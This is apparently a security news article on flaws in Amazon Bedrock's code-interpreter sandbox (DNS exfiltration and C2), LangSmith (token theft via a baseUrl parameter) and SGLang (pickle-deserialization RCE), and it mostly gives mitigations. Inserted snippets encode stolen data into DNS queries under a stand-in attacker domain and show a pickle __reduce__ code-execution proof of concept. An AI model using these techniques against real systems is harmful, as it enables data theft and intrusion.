AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE

Cybersecurity researchers have revealed details of a new technique for exfiltrating sensitive data from artificial intelligence (AI) code interpreters using domain name system (DNS) queries.
In a report published on Monday, BeyondTrust revealed that the sandbox mode of the Amazon Bedrock AgentCore Code Interpreter allows outbound DNS queries that an attacker can use to establish interactive shells and bypass network isolation. The issue, which does not have a CVE identifier, carries a CVSS score of 7.5 out of 10.0.
Amazon Bedrock AgentCore Code Interpreter is a fully managed service that enables AI agents to execute code securely in isolated sandbox environments, designed so that agent workloads cannot reach external systems. It was launched by Amazon in August 2025.
The fact that the service allows DNS queries despite the “no network access” configuration can allow “threat actors to establish command-and-control (C2) and data exfiltration channels over DNS in certain cases, bypassing the expected network isolation controls,” said Kinnaird McQuade, chief security architect at BeyondTrust.
In an experimental attack scenario, a threat actor could abuse this behavior to establish a bidirectional communication channel using DNS queries and responses, obtain an interactive reverse shell, achieve command execution, and exfiltrate sensitive information via DNS queries if the assigned IAM role has permissions to access AWS resources such as the S3 buckets storing that data.
In addition, the DNS communication method can be abused to deliver additional payloads to the Code Interpreter, making it poll the command-and-control (C2) DNS server to receive commands stored in DNS A records, execute them, and return the results via DNS subdomain queries.
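To make the exfiltration mechanism concrete, here is a minimal, illustrative sketch of how data can be smuggled out in DNS subdomain labels, as described above. The domain `c2.example`, the function names, and the chunking scheme are all hypothetical; a real attacker-controlled resolver would receive each query and reassemble the chunks.

```python
import binascii

MAX_LABEL = 63  # DNS limits each label to 63 bytes

def encode_exfil_queries(data: bytes, c2_domain: str) -> list[str]:
    """Split stolen data into hex chunks and embed each chunk as a
    subdomain label of an attacker-controlled domain, one query each."""
    hex_data = binascii.hexlify(data).decode()
    chunks = [hex_data[i:i + MAX_LABEL] for i in range(0, len(hex_data), MAX_LABEL)]
    # Prefix each chunk with a sequence number so the C2 server can reorder.
    return [f"{seq}.{chunk}.{c2_domain}" for seq, chunk in enumerate(chunks)]

def decode_exfil_queries(queries: list[str]) -> bytes:
    """What the attacker's DNS server would do: strip the domain,
    reassemble the hex chunks in sequence order, and decode."""
    parts = {}
    for q in queries:
        seq, chunk, *_ = q.split(".")
        parts[int(seq)] = chunk
    hex_data = "".join(parts[i] for i in sorted(parts))
    return binascii.unhexlify(hex_data)
```

Because most environments forward DNS lookups through upstream resolvers regardless of other network restrictions, each query for a name under the attacker’s domain eventually reaches the attacker’s authoritative name server, carrying the data in the query itself.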
It’s worth noting that Code Interpreter requires an IAM role to access AWS services. However, a simple misconfiguration can result in an overly privileged role being assigned to the service, granting it broad permissions to access sensitive data.
“This study shows how DNS resolution can undermine network isolation guarantees for sandboxed code interpreters,” BeyondTrust said. “Using this method, attackers could have exfiltrated sensitive data from AWS services accessible through the Code Interpreter’s IAM role, potentially causing downtime, a breach of sensitive customer data, or compromised infrastructure.”

Following responsible disclosure in September 2025, Amazon determined the behavior to be working as intended rather than a security issue, urging customers to use VPC mode instead of sandbox mode for complete network isolation. The tech giant also recommends using a DNS firewall to filter outbound DNS traffic.

“To protect critical workloads, administrators should document all active AgentCore Code Interpreter instances and quickly migrate those handling critical data from Sandbox mode to VPC mode,” said Jason Soroko, CEO at Sectigo.
“Working within a VPC provides the necessary infrastructure for strong network isolation, allowing teams to use strict security groups, network ACLs, and Route 53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution. Finally, security teams should carefully examine the IAM roles attached to these interpreters, strictly enforcing least privilege to limit the blast radius of a potential compromise.”
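As a sketch of the least-privilege advice above, the policy below scopes a Code Interpreter execution role to read-only access on a single bucket prefix rather than broad S3 permissions. The bucket name and prefix are hypothetical placeholders, not values from the report.

```python
import json

# Hypothetical least-privilege policy for a Code Interpreter execution
# role: read access to one named prefix instead of wildcard S3 access.
least_privilege_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject"],
            "Resource": "arn:aws:s3:::example-agent-workspace/inputs/*",
        }
    ],
}

print(json.dumps(least_privilege_policy, indent=2))
```

Even if the DNS channel exists, a role scoped this narrowly sharply limits what an attacker inside the sandbox could actually exfiltrate.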
LangSmith Flaw Risks Token Theft
The disclosure comes as Miggo Security detailed a critical security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5) that exposed users to potential token theft and account takeover. The issue, which affects both self-hosted and cloud deployments, was addressed in LangSmith version 0.12.71 released in December 2025.
The flaw has been identified as a URL parameter injection stemming from a lack of validation of the baseUrl parameter, which allows an attacker to steal a logged-in user’s administrator token, user ID, and workspace ID by having them sent to a server under the attacker’s control through social engineering techniques, such as tricking the victim into clicking a specially crafted link like the ones below –
- Cloud – smith.langchain[.]com/studio/?baseUrl=
- Self-hosted – /studio/?baseUrl=
Successful exploitation of the vulnerability could allow an attacker to gain unauthorized access to AI trace history, and expose internal SQL queries, CRM customer records, or source code by inspecting tool calls.
“A logged-in LangSmith user could be compromised simply by visiting an attacker-controlled site or clicking a malicious link,” said Miggo researchers Liad Eliyahu and Eliana Vuijsje.

“This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security boundaries. The vulnerability is compounded because, unlike ‘traditional’ software, AI agents have deep access to internal data sources and third-party services.”
Unsafe Pickle Deserialization Flaws in SGLang
A set of security vulnerabilities has also been flagged in SGLang, a popular open-source framework for serving large language models and multimodal AI models, which, if successfully exploited, could trigger unsafe pickle deserialization, resulting in remote code execution.
The vulnerabilities, discovered by Orca security researcher Igor Stepansky, remain unpatched as of writing. A brief description of the flaws is as follows –
- CVE-2026-3059 (CVSS score: 9.8) – An unauthenticated remote code execution vulnerability through the ZeroMQ (aka ZMQ) broker, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’s multimodal generation module.
- CVE-2026-3060 (CVSS score: 9.8) – An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’s encoder disaggregation system.
- CVE-2026-3989 (CVSS score: 7.8) – Use of the insecure pickle.load() function without authentication and proper validation in SGLang’s “replay_request_dump.py”, which could be exploited by supplying a malicious dump file.
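Why is `pickle.loads()` on untrusted bytes so dangerous? Pickle is not a data-only format: during deserialization it can invoke arbitrary callables recorded in the stream via `__reduce__`. The toy example below demonstrates the mechanism in-process; a real attacker would substitute a shell command for the harmless marker function.

```python
import pickle

EXECUTED = []

def attacker_payload():
    # Stands in for arbitrary attacker code, e.g. spawning a shell.
    EXECUTED.append("pwned")

class Malicious:
    # pickle calls __reduce__ when serializing; the (callable, args)
    # tuple it returns is invoked by the *unpickler* on the victim side.
    def __reduce__(self):
        return (attacker_payload, ())

blob = pickle.dumps(Malicious())
pickle.loads(blob)  # merely deserializing runs attacker_payload()
```

This is why a network-reachable endpoint that feeds received bytes into `pickle.loads()` without authentication, as described in the SGLang flaws above, amounts to unauthenticated remote code execution.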
“The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features,” Stepansky said. “The third involves unsafe deserialization in a dump replay utility.”
In a joint advisory, the CERT Coordination Center (CERT/CC) said SGLang is vulnerable to CVE-2026-3059 when the multimodal generation scheme is enabled, and to CVE-2026-3060 when the encoder parallel disaggregation scheme is enabled.
“If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, they can exploit the vulnerability by sending a malicious payload to the broker, which will deserialize it,” CERT/CC said.
SGLang users are recommended to restrict access to ZMQ sockets and ensure they are not exposed to untrusted networks. It is also advised to implement adequate network segmentation and access controls to prevent unauthorized interactions with ZeroMQ endpoints.
Although there is no evidence that the vulnerabilities have been exploited in the wild, it’s important to monitor for unexpected inbound TCP connections to the ZeroMQ broker port, unexpected child processes spawned by the SGLang Python process, file creation in unusual locations by the SGLang process, and unexpected outbound connections from the SGLang process.



